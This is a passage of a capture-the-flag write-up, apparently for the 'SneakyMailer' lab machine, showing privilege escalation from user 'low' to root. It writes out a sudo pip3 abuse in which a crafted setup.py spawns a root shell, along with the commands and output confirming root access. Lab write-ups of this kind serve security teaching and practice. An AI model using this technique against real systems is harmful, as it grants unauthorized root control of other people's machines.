10 privesc low > root
low@sneakymailer:/opt/scripts/low$ ls -la
total 16
drwxr-x--- 2 root low 4096 Jun 23 2020 .
drwxr-xr-x 5 root root 4096 May 26 2020 ..
-rwxr-x--- 1 root low 71 Jun 8 2020 install-module.sh
-rwxr-x--- 1 root low 1812 Jun 23 2020 install-modules.py
# we can read and execute
low@sneakymailer:/opt/scripts/low$ cat install-module.sh
#!/bin/bash
# install the module
/home/low/venv/bin/python $1 install
# install-modues.py
basically extracts the packkage and runs it, thats how we get shell for low.
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
Using https://gtfobins.github.io/gtfobins/pip/#sudo
low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo /usr/bin/pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.PZyCPyQge6
# whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
sneakymailer
Last updated